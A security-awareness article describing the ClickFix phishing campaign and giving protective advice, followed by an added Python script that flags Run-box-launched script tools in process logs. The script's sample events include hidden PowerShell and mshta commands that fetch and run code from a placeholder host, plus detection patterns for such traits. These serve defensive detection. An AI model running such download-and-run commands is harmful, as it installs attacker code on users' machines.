Cyber criminals are getting better at one thing in particular: convincing people to help them without realising it.
A recent campaign called ClickFix shows how attackers are using fear and urgency to trick everyday computer users into installing malware themselves. This attack has been seen mostly in Europe and is aimed at hotels and accommodation providers, but the technique could easily be used against anyone.
What is the ClickFix attack?
The attack usually starts with a fake email that looks like it comes from Booking.com. It might claim there is an urgent payment issue or a customer complaint that needs immediate attention.
When someone clicks the link in the email, they are taken to a malicious website. Instead of a normal web page, they see something designed to look like a Windows Blue Screen of Death. This is the scary error screen many people associate with serious system problems.
The fake screen tells the user that their computer has crashed and gives step-by-step instructions to fix it. The instructions ask the user to press the Windows key and R, open the Run box, and paste in a command to repair the problem.
Unfortunately, there is no problem at all. The command installs malware.
Why this trick works so well
This attack is clever because it relies on people, not software.
Most security tools are very good at blocking malicious downloads. They are not as good at stopping someone who is willingly copying and pasting commands because they believe they are fixing an error.
By following the instructions, the user unknowingly allows the attacker to install a remote access tool. This gives the attacker full control of the computer, including the ability to steal data, monitor activity, or spread further infections.
If the computer asks for permission during the process, the attackers rely on frustration. The permission prompt is shown again and again until the user clicks yes just to make the messages stop.
What attackers gain
Once installed, the malware hides itself inside legitimate Windows processes so it looks normal. This makes it harder for traditional antivirus software to spot.
From that point on, attackers can remotely access the system, steal credentials, capture sensitive data, and move deeper into a business network.
How to protect yourself and your team
The good news is that simple awareness goes a long way.
Never paste commands into the Windows Run box or PowerShell unless a trusted IT professional has asked you to do so. Legitimate websites do not display blue error screens or ask you to fix Windows issues from a browser.
Be cautious with urgent emails claiming to come from booking services or payment platforms. If something feels rushed or threatening, stop and verify it using official contact details rather than clicking links.
Make sure Windows is set to show full file extensions so it is easier to spot suspicious files.
If you manage systems, monitoring for unusual behaviour from built-in Windows tools and enabling PowerShell logging can help detect attacks like this early.
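One way to monitor for this behaviour, as an added example that is not taken from the article or its sources: a command pasted into the Run box starts as a child of explorer.exe, so process-creation events can be screened for that parent plus a script-capable tool and an unusual command line. The field names follow Sysmon process-creation events (Image, ParentImage, CommandLine); the tool list, the trait patterns and the sample events are assumptions constructed for illustration.

```python
import re

# Built-in Windows tools able to fetch or run code. Illustrative assumption,
# not a list taken from the campaign reports.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "msbuild.exe"}

# Command-line traits that are unusual for something typed into the Run box.
TRAITS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|curl)\b", re.I),
}

def basename(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the traits that make a process-creation event look like a pasted Run command."""
    # Win+R launches the command as a child of explorer.exe.
    if basename(event["ParentImage"]) != "explorer.exe":
        return []
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(event["CommandLine"])]

def detect(events):
    """Return (event, traits) pairs for events with at least one trait."""
    return [(e, t) for e in events if (t := score_event(e))]

# Constructed sample events (not real telemetry); example.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c ipconfig /all"},
    {"ParentImage": r"C:\Program Files\Agent\agent.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta https://example.invalid/verify.hta"},
]

if __name__ == "__main__":
    for event, traits in detect(SAMPLE_EVENTS):
        print(basename(event["Image"]), traits)
```

explorer.exe is also the parent of programs started from shortcuts and the Start menu, so hits are leads for triage rather than verdicts, and the trait list needs tuning to what is normal in your environment.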
The bigger lesson
This attack highlights a growing trend in cyber crime. Instead of fighting security software directly, attackers are targeting human behaviour.
By staying calm, slowing down, and questioning unexpected instructions, users can stop even very sophisticated attacks.
Sometimes the best security tool is simply knowing when not to click.